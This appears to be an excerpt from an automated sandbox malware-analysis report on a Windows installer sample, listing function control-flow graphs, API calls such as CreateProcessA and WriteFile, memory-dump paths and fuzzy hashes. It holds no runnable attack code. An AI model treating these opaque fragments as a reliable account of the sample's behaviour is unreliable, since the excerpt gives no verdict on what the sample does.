                            control_flow_graph 3722 6cc501c3-6cc501d3 3723 6cc501d5-6cc501e8 call 6cc430cf call 6cc430bc 3722->3723 3724 6cc501ed-6cc501ef 3722->3724 3741 6cc5056c 3723->3741 3726 6cc501f5-6cc501fb 3724->3726 3727 6cc50554-6cc50561 call 6cc430cf call 6cc430bc 3724->3727 3726->3727 3730 6cc50201-6cc50227 3726->3730 3746 6cc50567 call 6cc43810 3727->3746 3730->3727 3733 6cc5022d-6cc50236 3730->3733 3734 6cc50250-6cc50252 3733->3734 3735 6cc50238-6cc5024b call 6cc430cf call 6cc430bc 3733->3735 3739 6cc50550-6cc50552 3734->3739 3740 6cc50258-6cc5025b 3734->3740 3735->3746 3744 6cc5056f-6cc50572 3739->3744 3740->3739 3745 6cc50261-6cc50265 3740->3745 3741->3744 3745->3735 3749 6cc50267-6cc5027e 3745->3749 3746->3741 3751 6cc50280-6cc50283 3749->3751 3752 6cc502cf-6cc502d5 3749->3752 3755 6cc50285-6cc5028e 3751->3755 3756 6cc50293-6cc50299 3751->3756 3753 6cc502d7-6cc502e1 3752->3753 3754 6cc5029b-6cc502b2 call 6cc430cf call 6cc430bc call 6cc43810 3752->3754 3757 6cc502e3-6cc502e5 3753->3757 3758 6cc502e8-6cc50306 call 6cc47ee5 call 6cc47eab * 2 3753->3758 3786 6cc50487 3754->3786 3759 6cc50353-6cc50363 3755->3759 3756->3754 3760 6cc502b7-6cc502ca 3756->3760 3757->3758 3796 6cc50323-6cc5034c call 6cc4e359 3758->3796 3797 6cc50308-6cc5031e call 6cc430bc call 6cc430cf 3758->3797 3762 6cc50369-6cc50375 3759->3762 3763 6cc50428-6cc50431 call 6cc550d5 3759->3763 3760->3759 3762->3763 3767 6cc5037b-6cc5037d 3762->3767 3775 6cc504a4 3763->3775 3776 6cc50433-6cc50445 3763->3776 3767->3763 3772 6cc50383-6cc503a7 3767->3772 3772->3763 3777 6cc503a9-6cc503bf 3772->3777 3779 6cc504a8-6cc504c0 ReadFile 3775->3779 3776->3775 3781 6cc50447-6cc50456 GetConsoleMode 3776->3781 3777->3763 3782 6cc503c1-6cc503c3 3777->3782 3784 6cc504c2-6cc504c8 3779->3784 3785 6cc5051c-6cc50527 GetLastError 3779->3785 3781->3775 3787 6cc50458-6cc5045c 3781->3787 3782->3763 3788 6cc503c5-6cc503eb 3782->3788 3784->3785 3792 6cc504ca 3784->3792 3790 6cc50540-6cc50543 3785->3790 3791 6cc50529-6cc5053b call 6cc430bc call 6cc430cf 3785->3791 3794 6cc5048a-6cc50494 call 6cc47eab 3786->3794 3787->3779 3793 6cc5045e-6cc50478 ReadConsoleW 3787->3793 3788->3763 3795 6cc503ed-6cc50403 3788->3795 3803 6cc50480-6cc50486 call 6cc430e2 3790->3803 3804 6cc50549-6cc5054b 3790->3804 3791->3786 3799 6cc504cd-6cc504df 3792->3799 3801 6cc50499-6cc504a2 3793->3801 3802 6cc5047a GetLastError 3793->3802 3794->3744 3795->3763 3806 6cc50405-6cc50407 3795->3806 3796->3759 3797->3786 3799->3794 3810 6cc504e1-6cc504e5 3799->3810 3801->3799 3802->3803 3803->3786 3804->3794 3806->3763 3814 6cc50409-6cc50423 3806->3814 3817 6cc504e7-6cc504f7 call 6cc505ee 3810->3817 3818 6cc504fe-6cc50509 3810->3818 3814->3763 3829 6cc504fa-6cc504fc 3817->3829 3823 6cc50515-6cc5051a call 6cc508a6 3818->3823 3824 6cc5050b call 6cc50573 3818->3824 3830 6cc50510-6cc50513 3823->3830 3824->3830 3829->3794 3830->3829
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: bdcf20138793cf6b7ee1170d7e4a48b1a583c193a2ec8630eb9d4e6663de0fb4
                            • Instruction ID: 7dd3a133d115404772ee126a84ecc54ba401d6ea06fb7bf277a02ba6b2900ce4
                            • Opcode Fuzzy Hash: bdcf20138793cf6b7ee1170d7e4a48b1a583c193a2ec8630eb9d4e6663de0fb4
                            • Instruction Fuzzy Hash: 26C12470E042859FDF01CF99C880BADBBB4BF4A31CF948159E514EBB81E7318965CB69
                            Function 6CC5775C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3831 6cc5775c-6cc5778c call 6cc57bdc 3834 6cc577a7-6cc577b3 call 6cc54cfc 3831->3834 3835 6cc5778e-6cc57799 call 6cc430cf 3831->3835 3841 6cc577b5-6cc577ca call 6cc430cf call 6cc430bc 3834->3841 3842 6cc577cc-6cc57815 call 6cc57b47 3834->3842 3840 6cc5779b-6cc577a2 call 6cc430bc 3835->3840 3851 6cc57a81-6cc57a85 3840->3851 3841->3840 3849 6cc57817-6cc57820 3842->3849 3850 6cc57882-6cc5788b GetFileType 3842->3850 3853 6cc57857-6cc5787d GetLastError call 6cc430e2 3849->3853 3854 6cc57822-6cc57826 3849->3854 3855 6cc578d4-6cc578d7 3850->3855 3856 6cc5788d-6cc578be GetLastError call 6cc430e2 CloseHandle 3850->3856 3853->3840 3854->3853 3860 6cc57828-6cc57855 call 6cc57b47 3854->3860 3858 6cc578e0-6cc578e6 3855->3858 3859 6cc578d9-6cc578de 3855->3859 3856->3840 3870 6cc578c4-6cc578cf call 6cc430bc 3856->3870 3863 6cc578ea-6cc57938 call 6cc54ea0 3858->3863 3864 6cc578e8 3858->3864 3859->3863 3860->3850 3860->3853 3874 6cc57957-6cc5797f call 6cc57e00 3863->3874 3875 6cc5793a-6cc57946 call 6cc57d56 3863->3875 3864->3863 3870->3840 3880 6cc57984-6cc579c5 3874->3880 3881 6cc57981-6cc57982 3874->3881 3875->3874 3882 6cc57948 3875->3882 3884 6cc579c7-6cc579cb 3880->3884 3885 6cc579e6-6cc579f4 3880->3885 3883 6cc5794a-6cc57952 call 6cc4f015 3881->3883 3882->3883 3883->3851 3884->3885 3886 6cc579cd-6cc579e1 3884->3886 3887 6cc57a7f 3885->3887 3888 6cc579fa-6cc579fe 3885->3888 3886->3885 3887->3851 3888->3887 3890 6cc57a00-6cc57a33 CloseHandle call 6cc57b47 3888->3890 3894 6cc57a35-6cc57a61 GetLastError call 6cc430e2 call 6cc54e0f 3890->3894 3895 6cc57a67-6cc57a7b 3890->3895 3894->3895 3895->3887
                            APIs
                              • Part of subcall function 6CC57B47: CreateFileW.KERNEL32(00000000,00000000,?,6CC57805,?,?,00000000,?,6CC57805,00000000,0000000C), ref: 6CC57B64
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC57870
                            • __dosmaperr.LIBCMT ref: 6CC57877
                            • GetFileType.KERNEL32(00000000), ref: 6CC57883
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC5788D
                            • __dosmaperr.LIBCMT ref: 6CC57896
                            • CloseHandle.KERNEL32(00000000), ref: 6CC578B6
                            • CloseHandle.KERNEL32(6CC4E7C0), ref: 6CC57A03
                            • GetLastError.KERNEL32 ref: 6CC57A35
                            • __dosmaperr.LIBCMT ref: 6CC57A3C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: 8Q
                            • API String ID: 4237864984-4022487301
                            • Opcode ID: ef8b0bae724a96263f14a164b41e00cf67f19ef7ac56204c1dd9f6f3977617af
                            • Instruction ID: 909ef90deee0d6feaa42d08bb1e556298b384e85a5b653dab81e7e8f7f54e06d
                            • Opcode Fuzzy Hash: ef8b0bae724a96263f14a164b41e00cf67f19ef7ac56204c1dd9f6f3977617af
                            • Instruction Fuzzy Hash: 62A13532A241048FCF098F68CC91BED7BB1AB47328F58824AE811EF390E7358976D755
                            Function 6CC0B4D0 Relevance: 16.6, APIs: 3, Strings: 6, Instructions: 834fileCOMMON
                            Download Yara Rule
                            APIs
                            • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 6CC0B62F
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID: *$,=ym$-=ym$-=ym$B$H
                            • API String ID: 3934441357-3163594065
                            • Opcode ID: 2604d77ed172de3d276cc1aae07752c6a3fd583ceef924029ff7069e249694d9
                            • Instruction ID: 4d71989bd0710e6776b246a894a84bb1ece4685178e75583878ea1240969d189
                            • Opcode Fuzzy Hash: 2604d77ed172de3d276cc1aae07752c6a3fd583ceef924029ff7069e249694d9
                            • Instruction Fuzzy Hash: FB729B746093459FCB24CF29C4A065ABBE1BF89304F188E5EE499CBB50E736D885CB53
                            Function 6CAB4200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;T55
                            • API String ID: 0-2572755013
                            • Opcode ID: beb00db9d402cca1c853ee21b6d13fbeb7a6a8bebff811ad32ba6155075859bf
                            • Instruction ID: a48a5958d9753ea6113ff4bc5dfac1ef6ea0ce1241e7d747506c569b113f6577
                            • Opcode Fuzzy Hash: beb00db9d402cca1c853ee21b6d13fbeb7a6a8bebff811ad32ba6155075859bf
                            • Instruction Fuzzy Hash: D703C131745B018FC728CF28C8D0696B7F2AFD532471D8B6DC0AA4BA95DB74B48ACB51
                            Function 6CC386E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processsynchronizationCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4469 6cc386e0-6cc38767 CreateProcessA 4470 6cc3878b-6cc38794 4469->4470 4471 6cc387b0-6cc387fa WaitForSingleObject CloseHandle * 2 4470->4471 4472 6cc38796-6cc3879b 4470->4472 4471->4470 4473 6cc38770-6cc38783 4472->4473 4474 6cc3879d-6cc387a2 4472->4474 4473->4470 4474->4470 4475 6cc387a4-6cc38807 4474->4475
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CloseHandle$CreateObjectProcessSingleWait
                            • String ID: D
                            • API String ID: 2059082233-2746444292
                            • Opcode ID: c7bdadb915c58a0cb57fd6737435e2c696ec550452de6753749c4b588a7f0812
                            • Instruction ID: 1a9f9a4016cd582fd6362c23accd5782c3e1d41c9cd32d0b7712f8c31c861b7a
                            • Opcode Fuzzy Hash: c7bdadb915c58a0cb57fd6737435e2c696ec550452de6753749c4b588a7f0812
                            • Instruction Fuzzy Hash: BF31E371809740CFD750DF29D188B1ABBF0AB9A318F516A1EF8E986350E7749584CF43
                            Function 6CC4F34E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4477 6cc4f34e-6cc4f36a 4478 6cc4f370-6cc4f372 4477->4478 4479 6cc4f529 4477->4479 4480 6cc4f394-6cc4f3b5 4478->4480 4481 6cc4f374-6cc4f387 call 6cc430cf call 6cc430bc call 6cc43810 4478->4481 4482 6cc4f52b-6cc4f52f 4479->4482 4483 6cc4f3b7-6cc4f3ba 4480->4483 4484 6cc4f3bc-6cc4f3c2 4480->4484 4497 6cc4f38c-6cc4f38f 4481->4497 4483->4484 4486 6cc4f3c4-6cc4f3c9 4483->4486 4484->4481 4484->4486 4488 6cc4f3da-6cc4f3eb call 6cc4f530 4486->4488 4489 6cc4f3cb-6cc4f3d7 call 6cc4e359 4486->4489 4498 6cc4f42c-6cc4f43e 4488->4498 4499 6cc4f3ed-6cc4f3ef 4488->4499 4489->4488 4497->4482 4500 6cc4f485-6cc4f4a7 WriteFile 4498->4500 4501 6cc4f440-6cc4f449 4498->4501 4502 6cc4f416-6cc4f422 call 6cc4f5a1 4499->4502 4503 6cc4f3f1-6cc4f3f9 4499->4503 4504 6cc4f4b2 4500->4504 4505 6cc4f4a9-6cc4f4af GetLastError 4500->4505 4507 6cc4f475-6cc4f483 call 6cc4f9b3 4501->4507 4508 6cc4f44b-6cc4f44e 4501->4508 4511 6cc4f427-6cc4f42a 4502->4511 4509 6cc4f3ff-6cc4f40c call 6cc4f94b 4503->4509 4510 6cc4f4bb-6cc4f4be 4503->4510 4512 6cc4f4b5-6cc4f4ba 4504->4512 4505->4504 4507->4511 4514 6cc4f465-6cc4f473 call 6cc4fb77 4508->4514 4515 6cc4f450-6cc4f453 4508->4515 4519 6cc4f40f-6cc4f411 4509->4519 4513 6cc4f4c1-6cc4f4c6 4510->4513 4511->4519 4512->4510 4520 6cc4f524-6cc4f527 4513->4520 4521 6cc4f4c8-6cc4f4cd 4513->4521 4514->4511 4515->4513 4522 6cc4f455-6cc4f463 call 6cc4fa8e 4515->4522 4519->4512 4520->4482 4525 6cc4f4cf-6cc4f4d4 4521->4525 4526 6cc4f4f9-6cc4f505 4521->4526 4522->4511 4531 6cc4f4d6-6cc4f4e8 call 6cc430bc call 6cc430cf 4525->4531 4532 6cc4f4ed-6cc4f4f4 call 6cc430e2 4525->4532 4529 6cc4f507-6cc4f50a 4526->4529 4530 6cc4f50c-6cc4f51f call 6cc430bc call 6cc430cf 4526->4530 4529->4479 4529->4530 4530->4497 4531->4497 4532->4497
                            APIs
                              • Part of subcall function 6CC4F5A1: GetConsoleCP.KERNEL32(?,6CC4E7C0,?), ref: 6CC4F5E9
                            • WriteFile.KERNEL32(?,?,6CC57DDC,00000000,00000000,?,00000000,00000000,6CC591A6,00000000,00000000,?,00000000,6CC4E7C0,6CC57DDC,00000000), ref: 6CC4F49F
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC57DDC,6CC4E7C0,00000000,?,?,?,?,00000000,?), ref: 6CC4F4A9
                            • __dosmaperr.LIBCMT ref: 6CC4F4EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                            • String ID: 8Q
                            • API String ID: 251514795-4022487301
                            • Opcode ID: 7f406034f7486bd31f6bd8e44afbd7465296386f8a3412f229e70ec6573f67f6
                            • Instruction ID: fee724355b948132999694805587c26225408b99c135a6c35bab79335b5e3e27
                            • Opcode Fuzzy Hash: 7f406034f7486bd31f6bd8e44afbd7465296386f8a3412f229e70ec6573f67f6
                            • Instruction Fuzzy Hash: D551F671A0010AAFEB01CFA9C880BEEBBB9FF4A358F14D551E510ABA41F770D945CB61
                            Function 6CC39280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4544 6cc39280-6cc3928c 4545 6cc3928e-6cc39299 4544->4545 4546 6cc392cd 4544->4546 4547 6cc3929b-6cc392ad 4545->4547 4548 6cc392af-6cc392bc call 6cb001f0 call 6cc44208 4545->4548 4549 6cc392cf-6cc39347 4546->4549 4547->4548 4558 6cc392c1-6cc392cb 4548->4558 4551 6cc39373-6cc39379 4549->4551 4552 6cc39349-6cc39371 4549->4552 4552->4551 4554 6cc3937a-6cc39439 call 6cb02250 call 6cb02340 call 6cc3ca69 call 6cafe010 call 6cc3a778 4552->4554 4558->4549
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC39421
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 323602529-1866435925
                            • Opcode ID: 3882c10eadea1b5302492fe116a5ac031cd0fd6276986634af69e4801a072124
                            • Instruction ID: d980beb2ed7e1277b4cd761db395c9934b76ed57a13bac096aed61dd653319b9
                            • Opcode Fuzzy Hash: 3882c10eadea1b5302492fe116a5ac031cd0fd6276986634af69e4801a072124
                            • Instruction Fuzzy Hash: 345145B5500B008FD725CF25C585B97BBF1BB89318F448A2DD8864BB90E775B909CF90
                            Function 6CC0CEA0 Relevance: 6.2, APIs: 4, Instructions: 187fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4567 6cc0cea0-6cc0cf03 call 6cc3a260 4570 6cc0cf40-6cc0cf49 4567->4570 4571 6cc0cf90-6cc0cf95 4570->4571 4572 6cc0cf4b-6cc0cf50 4570->4572 4573 6cc0d030-6cc0d035 4571->4573 4574 6cc0cf9b-6cc0cfa0 4571->4574 4575 6cc0d000-6cc0d005 4572->4575 4576 6cc0cf56-6cc0cf5b 4572->4576 4583 6cc0d03b-6cc0d040 4573->4583 4584 6cc0d17d-6cc0d191 4573->4584 4579 6cc0cf05-6cc0cf21 WriteFile 4574->4579 4580 6cc0cfa6-6cc0cfab 4574->4580 4581 6cc0d125-6cc0d158 call 6cc3ea90 4575->4581 4582 6cc0d00b-6cc0d010 4575->4582 4577 6cc0cf61-6cc0cf66 4576->4577 4578 6cc0d065-6cc0d08c 4576->4578 4587 6cc0d091-6cc0d0aa WriteFile 4577->4587 4588 6cc0cf6c-6cc0cf71 4577->4588 4589 6cc0cf33-6cc0cf38 4578->4589 4594 6cc0cf30 4579->4594 4591 6cc0cfb1-6cc0cfb6 4580->4591 4592 6cc0d0af-6cc0d120 WriteFile 4580->4592 4581->4570 4595 6cc0d016-6cc0d01b 4582->4595 4596 6cc0d15d-6cc0d175 4582->4596 4585 6cc0d046-6cc0d060 4583->4585 4586 6cc0d1a7-6cc0d1ac 4583->4586 4593 6cc0d195-6cc0d1a2 4584->4593 4585->4593 4586->4570 4600 6cc0d1b2-6cc0d1c0 4586->4600 4587->4594 4588->4570 4597 6cc0cf73-6cc0cf86 4588->4597 4589->4570 4591->4570 4599 6cc0cfb8-6cc0cfee call 6cc3f010 ReadFile 4591->4599 4592->4594 4593->4570 4594->4589 4595->4570 4601 6cc0d021-6cc0d02b 4595->4601 4596->4584 4597->4589 4599->4594 4601->4594
                            APIs
                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CC0CFE1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 220d09d305b559261c85d4e9edd41b8c8bddb702cbdf180569fb66ac94156e72
                            • Instruction ID: 07d25f56630cf37206428a0fc771ea0f32935f62cc2f947cd5b98731b855dd8d
                            • Opcode Fuzzy Hash: 220d09d305b559261c85d4e9edd41b8c8bddb702cbdf180569fb66ac94156e72
                            • Instruction Fuzzy Hash: F0714DB0209345AFD710DF19C884B5ABBF4BF89708F50492EF598C7690E776D9848B93
                            Function 6CC0C390 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 631COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4626 6cc0c390-6cc0c406 call 6cc3a260 call 6cc3f010 4631 6cc0c426-6cc0c42f 4626->4631 4632 6cc0c490-6cc0c495 4631->4632 4633 6cc0c431-6cc0c436 4631->4633 4636 6cc0c570-6cc0c575 4632->4636 4637 6cc0c49b-6cc0c4a0 4632->4637 4634 6cc0c500-6cc0c505 4633->4634 4635 6cc0c43c-6cc0c441 4633->4635 4644 6cc0c679-6cc0c67e 4634->4644 4645 6cc0c50b-6cc0c510 4634->4645 4642 6cc0c447-6cc0c44c 4635->4642 4643 6cc0c5bf-6cc0c5c4 4635->4643 4638 6cc0c6d6-6cc0c6db 4636->4638 4639 6cc0c57b-6cc0c580 4636->4639 4640 6cc0c4a6-6cc0c4ab 4637->4640 4641 6cc0c638-6cc0c63d 4637->4641 4652 6cc0c6e1-6cc0c6e6 4638->4652 4653 6cc0c912-6cc0c917 4638->4653 4648 6cc0c830-6cc0c835 4639->4648 4649 6cc0c586-6cc0c58b 4639->4649 4650 6cc0c4b1-6cc0c4b6 4640->4650 4651 6cc0c796-6cc0c79b 4640->4651 4658 6cc0c643-6cc0c648 4641->4658 4659 6cc0c8ab-6cc0c8b0 4641->4659 4656 6cc0c742-6cc0c747 4642->4656 4657 6cc0c452-6cc0c457 4642->4657 4654 6cc0c863-6cc0c868 4643->4654 4655 6cc0c5ca-6cc0c5cf 4643->4655 4646 6cc0c8e2-6cc0c8e7 4644->4646 4647 6cc0c684-6cc0c689 4644->4647 4660 6cc0c516-6cc0c51b 4645->4660 4661 6cc0c7de-6cc0c7e3 4645->4661 4662 6cc0cdf9-6cc0ce12 4646->4662 4663 6cc0c8ed-6cc0c8f2 4646->4663 4664 6cc0cb61-6cc0cb85 4647->4664 4665 6cc0c68f-6cc0c694 4647->4665 4682 6cc0c83b-6cc0c840 4648->4682 4683 6cc0cd6c-6cc0cd88 4648->4683 4678 6cc0c591-6cc0c596 4649->4678 4679 6cc0c9fe-6cc0ca3a 4649->4679 4666 6cc0c97a-6cc0c984 4650->4666 4667 6cc0c4bc-6cc0c4c1 4650->4667 4676 6cc0c7a1-6cc0c7a6 4651->4676 4677 6cc0c408-6cc0c418 4651->4677 4670 6cc0cc12-6cc0cc4d call 6cc3f010 call 6cc0b4d0 4652->4670 4671 6cc0c6ec-6cc0c6f1 4652->4671 4668 6cc0ce1a-6cc0ce29 4653->4668 4669 6cc0c91d-6cc0c922 4653->4669 4686 6cc0cdb7-6cc0cdbf 4654->4686 4687 6cc0c86e-6cc0c873 4654->4687 4684 6cc0ca71-6cc0ca9b call 6cc3ea90 4655->4684 4685 6cc0c5d5-6cc0c5da 4655->4685 4672 6cc0cca3-6cc0ccba 4656->4672 4673 6cc0c74d-6cc0c752 4656->4673 4688 6cc0c93d-6cc0c95b 4657->4688 4689 6cc0c45d-6cc0c462 4657->4689 4690 6cc0cb08-6cc0cb34 4658->4690 4691 6cc0c64e-6cc0c653 4658->4691 4692 6cc0c8b6-6cc0c8bb 4659->4692 4693 6cc0cdda-6cc0cdf1 4659->4693 4674 6cc0c521-6cc0c526 4660->4674 4675 6cc0c9a3-6cc0c9b3 4660->4675 4680 6cc0c7e9-6cc0c7ee 4661->4680 4681 6cc0ccfa-6cc0cd23 4661->4681 4662->4668 4663->4631 4715 6cc0c8f8-6cc0c90d 4663->4715 4664->4631 4694 6cc0cb8a-6cc0cc0d 4665->4694 4695 6cc0c69a-6cc0c69f 4665->4695 4666->4631 4716 6cc0c4c7-6cc0c4cc 4667->4716 4717 6cc0c989-6cc0c99e 4667->4717 4710 6cc0ce31-6cc0ce36 4668->4710 